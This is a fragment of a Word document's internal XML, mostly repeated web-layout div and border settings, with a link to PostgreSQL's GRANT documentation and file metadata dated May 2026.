        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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735323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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59942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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8053">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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846853">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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569426">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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postgresql.org/docs/current/sql-grant.html"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173</TotalTime>
  <Pages>29</Pages>
  <Words>6670</Words>
  <Characters>38022</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>316</Lines>
  <Paragraphs>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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-06T21:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-06T23:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>